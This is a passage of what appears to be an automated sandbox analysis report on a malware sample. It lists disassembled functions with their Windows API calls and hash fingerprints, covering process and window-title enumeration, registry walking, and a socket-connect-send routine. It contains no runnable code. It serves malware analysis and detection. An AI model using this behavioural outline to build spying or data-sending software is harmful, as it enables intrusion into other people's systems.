                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 2180151492-0
                                                  • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                  • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                  • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                  • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                  Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                  Function 021332FF Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction ID: d97d99adbf00298393b140ebf0630ac6e66dd793c7b9f750bef6ed85d79279c8
                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction Fuzzy Hash: 9541D332A40214EFDB25DF78C880A5EB7B7EF84724B1585A9E525EB391DB31E901CB84
                                                  Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                  • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                  • __freea.LIBCMT ref: 0044FFC4
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                  • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                  • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                  • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                  Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                  • _free.LIBCMT ref: 0044E1A0
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                  • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                  • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                  • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                  Function 0213E3A2 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0213E3AB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0213E3CE
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0213E3F4
                                                  • _free.LIBCMT ref: 0213E407
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0213E416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                  • Instruction ID: 06ce5d8ca48dcc326c959d3c111b98604d5acdbdc88129d70fe7ad132cb72bb1
                                                  • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                  • Instruction Fuzzy Hash: 880178A2645B557F27221ABA6C8CC7BAE6FDECAEB53150139FD04D2201EB61CC02C5B5
                                                  Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                  • _free.LIBCMT ref: 00446F7D
                                                  • _free.LIBCMT ref: 00446FA4
                                                  • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                  • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                  Function 021371AA Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0212AA29,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000,00000000,020F2E6F,?), ref: 021371AF
                                                  • _free.LIBCMT ref: 021371E4
                                                  • _free.LIBCMT ref: 0213720B
                                                  • SetLastError.KERNEL32(00000000), ref: 02137218
                                                  • SetLastError.KERNEL32(00000000), ref: 02137221
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction ID: b59c13f75b778b4de292d9b2ae89cd1a27f3c41a264d26bc9dc0106cb764da03
                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction Fuzzy Hash: E101D1B61C47017BC61326356C44A2F6A6FEBC1771B250139F828A22D1EF22C8038528
                                                  Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                  • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                  Function 0210B5E4 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0210B62F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0210B63A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0210B642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction ID: 761aa78c3cf20443ba2a7edd46ae7e8396d0b16919a9e3992449ab0e9003b300
                                                  • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction Fuzzy Hash: C3F07D712883056BD71067D4AC99F7BB26CDB44796F010075F612D21E1EFF0CE814AA5
                                                  Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0044F7B5
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044F7C7
                                                  • _free.LIBCMT ref: 0044F7D9
                                                  • _free.LIBCMT ref: 0044F7EB
                                                  • _free.LIBCMT ref: 0044F7FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                  Function 0213FA04 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0213FA1C
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213FA2E
                                                  • _free.LIBCMT ref: 0213FA40
                                                  • _free.LIBCMT ref: 0213FA52
                                                  • _free.LIBCMT ref: 0213FA64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction ID: 6e014a7b4167ae35947e7e856bc2992a6dcae5b52f18cf5efb082bab32e09220
                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction Fuzzy Hash: EBF01232985244BF8662DB65E885C1677EFEA017347945819F048D7960C733FCC1CA58
                                                  Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                  • IsWindowVisible.USER32(?), ref: 004167A1
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (FG
                                                  • API String ID: 3142014140-2273637114
                                                  • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                  • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                  Function 021069B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 021069CF
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 02106A01
                                                  • IsWindowVisible.USER32(?), ref: 02106A08
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (FG
                                                  • API String ID: 3142014140-2273637114
                                                  • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction ID: 0da89d10a6b4933584687107be04c8954425e71be0d5aeee896dedc0bbe960fc
                                                  • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                  • Instruction Fuzzy Hash: 4D7108721883414ED3A5FB20D8A0EEF73A6FFE4300F50456DDA8A42594EF346A49DF56
                                                  Function 02102C11 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02102C84
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02102CB3
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 02102D54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: DG
                                                  • API String ID: 3554306468-2560412334
                                                  • Opcode ID: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                  • Instruction ID: 2d567e05e56efbea3f7271a897860ecf4582f7bbff176a4b7b9f8041b7da76cd
                                                  • Opcode Fuzzy Hash: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                  • Instruction Fuzzy Hash: 48512072148344AFD350EB60DC84EEBB3EDFF94700F00492EBA9592550EB74EA09CB66
                                                  Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044D4A8
                                                  • _free.LIBCMT ref: 0044D5C5
                                                    • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                    • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                    • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                  • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                  Function 0213D6C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0213D70F
                                                  • _free.LIBCMT ref: 0213D82C
                                                    • Part of subcall function 0212AABB: IsProcessorFeaturePresent.KERNEL32(00000017,0212AA8D,?,?,020F1BC9,?,?,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000), ref: 0212AABD
                                                    • Part of subcall function 0212AABB: GetCurrentProcess.KERNEL32(C0000417), ref: 0212AADF
                                                    • Part of subcall function 0212AABB: TerminateProcess.KERNEL32(00000000), ref: 0212AAE6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction ID: 40a78cae5b800a90d187e86258638994add200799e8bb882a05aa4fa567d3d75
                                                  • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                  • Instruction Fuzzy Hash: 7E519076E40219EFDF15DFA8D880AADBBB6EF48314F248169E854E7340E731AA01CF50
                                                  Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                    • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                  • String ID: XCG$`AG$>G
                                                  • API String ID: 2334542088-2372832151
                                                  • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                  • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                  • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                  Function 020F983D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 020F9868
                                                    • Part of subcall function 020F4458: socket.WS2_32(00000000,00000001,00000006), ref: 020F4479
                                                    • Part of subcall function 020F44F3: connect.WS2_32(?,00000000,00000000), ref: 020F450C
                                                    • Part of subcall function 0210B911: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,020F98F0,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0210B926
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
